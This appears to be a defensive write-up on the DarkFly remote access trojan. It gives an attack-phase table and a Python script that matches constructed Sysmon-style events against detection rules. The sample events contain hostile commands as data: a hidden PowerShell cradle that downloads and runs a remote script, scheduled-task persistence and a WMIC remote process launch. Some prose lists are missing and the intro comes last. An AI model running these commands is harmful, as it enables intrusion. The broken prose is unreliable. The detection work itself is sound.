| Phase | Tools/Methods Used |
|-------|--------------------|
| Delivery | Phishing email with macro-enabled Office doc or ISO containing loader |
| Execution | PowerShell download cradle or WScript launcher |
| Persistence | Registry Run key + scheduled task |
| Evasion | Process hollowing into notepad.exe or regsvr32.exe |
| Recon | Keylogger, browser stealer, netstat -an, ipconfig /all |
| Lateral Movement | SMB copy + WMI execution or RDP hijacking |
| Exfiltration | HTTPS POST to C2 or Telegram bot API |
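The table above is a detection map as much as an attack map: each row has an observable that shows up in host telemetry. The following is an added example (not DarkFly code and not from the original page) that turns the rows into rules and runs them over a handful of constructed Sysmon-style events. Field names mirror Sysmon (`Image`, `ParentImage`, `CommandLine`, `TargetObject`, `DestinationHostname`); the event contents, hostnames and paths are made up for the demo. Process hollowing itself is not visible in process-creation logs, so the Evasion rule keys on its side effect: a network connection from a binary such as notepad.exe that has no business making one.

```python
"""Map constructed Sysmon-style events onto the DarkFly phase table.

Added example, not DarkFly code. Events, hostnames and paths below are
constructed for this demo; only the field names follow Sysmon.
Event IDs as in Sysmon: 1 = process create, 3 = network connection,
13 = registry value set.
"""
import json
import re

SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/ld.ps1')"}
{"EventID": 13, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "Details": "C:\\Users\\Public\\upd.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\schtasks.exe", "ParentImage": "C:\\Users\\Public\\upd.exe", "CommandLine": "schtasks /create /sc minute /mo 15 /tn Updater /tr C:\\Users\\Public\\upd.exe"}
{"EventID": 3, "Image": "C:\\Windows\\System32\\notepad.exe", "DestinationHostname": "203.0.113.5", "DestinationPort": 443}
{"EventID": 1, "Image": "C:\\Windows\\System32\\ipconfig.exe", "ParentImage": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "ipconfig /all"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "ParentImage": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "wmic /node:FS01 process call create \"cmd /c \\\\FS01\\C$\\Windows\\Temp\\upd.exe\""}
{"EventID": 3, "Image": "C:\\Windows\\System32\\notepad.exe", "DestinationHostname": "api.telegram.org", "DestinationPort": 443}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe C:\\Users\\alice\\notes.txt"}
"""

PHASE_ORDER = ["Delivery", "Execution", "Persistence", "Evasion",
               "Recon", "Lateral Movement", "Exfiltration"]

# Binaries with no legitimate reason to talk to the network; a connection
# from one of them is the observable left behind by process hollowing.
HOLLOWING_HOSTS = {"notepad.exe", "regsvr32.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
RECON_CMDS = {"ipconfig.exe", "netstat.exe", "whoami.exe", "net.exe"}

CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b"
    r"|invoke-expression|-enc(odedcommand)?\b", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
WMI_REMOTE = re.compile(r"/node:\S+.*process\s+call\s+create", re.I)


def _img(e):
    return e.get("Image", "").rsplit("\\", 1)[-1].lower()


def _parent(e):
    return e.get("ParentImage", "").rsplit("\\", 1)[-1].lower()


def _cmd(e):
    return e.get("CommandLine", "")


# (phase, rule name, predicate over one event)
RULES = [
    ("Delivery", "office_spawns_script_host",
     lambda e: e["EventID"] == 1 and _parent(e) in OFFICE and _img(e) in SCRIPT_HOSTS),
    ("Execution", "powershell_download_cradle",
     lambda e: e["EventID"] == 1 and _img(e) == "powershell.exe" and bool(CRADLE.search(_cmd(e)))),
    ("Persistence", "run_key_set",
     lambda e: e["EventID"] == 13 and bool(RUN_KEY.search(e.get("TargetObject", "")))),
    ("Persistence", "schtasks_create",
     lambda e: e["EventID"] == 1 and _img(e) == "schtasks.exe" and "/create" in _cmd(e).lower()),
    ("Evasion", "network_from_hollowing_host",
     lambda e: e["EventID"] == 3 and _img(e) in HOLLOWING_HOSTS),
    ("Recon", "recon_cmd_from_hollowing_host",
     lambda e: e["EventID"] == 1 and _img(e) in RECON_CMDS and _parent(e) in HOLLOWING_HOSTS),
    ("Lateral Movement", "wmic_remote_process_create",
     lambda e: e["EventID"] == 1 and _img(e) == "wmic.exe" and bool(WMI_REMOTE.search(_cmd(e)))),
    ("Exfiltration", "telegram_bot_api",
     lambda e: e["EventID"] == 3 and e.get("DestinationHostname", "").lower() == "api.telegram.org"),
]


def parse_events(text):
    """Parse JSON-lines telemetry into a list of event dicts."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def evaluate(events):
    """Return (event_index, phase, rule_name) for every rule that fires."""
    hits = []
    for i, e in enumerate(events):
        for phase, name, pred in RULES:
            if pred(e):
                hits.append((i, phase, name))
    return hits


def phases_observed(hits):
    """Distinct phases seen, in kill-chain order; breadth is the real signal."""
    seen = {phase for _, phase, _ in hits}
    return [p for p in PHASE_ORDER if p in seen]


if __name__ == "__main__":
    found = evaluate(parse_events(SAMPLE_EVENTS))
    for idx, phase, rule in found:
        print(f"event {idx}: {phase:17s} {rule}")
    print("phases covered:", phases_observed(found))
```

Any single rule here is noisy on its own (administrators run `ipconfig /all`, and scheduled tasks get created legitimately); the useful alert is a host that touches four or more distinct phases within one window, which is why `phases_observed` exists alongside the raw hits. The benign last event (notepad opened from Explorer with no network activity) is included to show that the hollowing rule keys on the network connection, not on the binary name.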
The "tool use" in DarkFly is not only a matter of technical capability; it is also process discipline. Operators following DarkFly principles adhere to strict rules of engagement:
These OPSEC measures make DarkFly incidents extraordinarily hard to correlate across different victim environments.
Once resident on a compromised host, DarkFly relies on "living-off-the-land" (LotL) binaries already present on the system for lateral movement. Instead of uploading mimikatz.exe, it uses:
Crucially, DarkFly tools are often signed with stolen or revoked code-signing certificates, which lets them pass Windows Defender SmartScreen and Application Control policies. A stolen certificate looks legitimate until its owner revokes it, a revoked one still passes on hosts where revocation checking is unavailable or not enforced, and any Application Control publisher rule that trusts the abused signer admits the malware until that rule is removed; signature status alone is therefore not a trust decision.
DarkFly is a sophisticated Remote Access Trojan (RAT) known for its modular architecture, anti-detection mechanisms, and a broad set of tooling designed for data theft, surveillance, and lateral movement. Its toolset mimics legitimate system utilities but repurposes them for malicious ends, making detection challenging.